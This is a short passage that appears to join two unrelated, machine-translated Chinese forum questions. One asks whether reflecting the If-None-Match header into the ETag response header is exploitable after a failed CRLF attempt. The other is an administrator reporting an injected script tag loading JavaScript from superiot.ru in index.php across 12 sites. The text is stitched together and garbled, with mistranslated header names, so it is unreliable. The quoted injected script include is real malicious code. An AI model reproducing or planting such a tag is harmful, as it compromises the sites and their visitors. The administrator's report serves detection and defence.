这个网站在请求中有一个标题(如果-无匹配),无论您为其设置值,响应都将包含一个标头(ETag),其值为If- to Match标头。
我理解它为什么这样做,但是是否有任何可能的利用,可以通过从请求到响应的头值的反射来执行?
我尝试了CRLF,但失败了,因为响应头没有解码请求中的URL编码或Unicode实体。
我管理几十个网站的主机。从大约一个星期以来,我在index.php文件中的12个不同网站中找到了这段代码:
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs
<!-- some hash here-->
有些网站是在不同的服务器上,有些不是。我只是想知道是否有其他人也看到了这一点。
使用更多信息编辑:
所有服务器都是centOS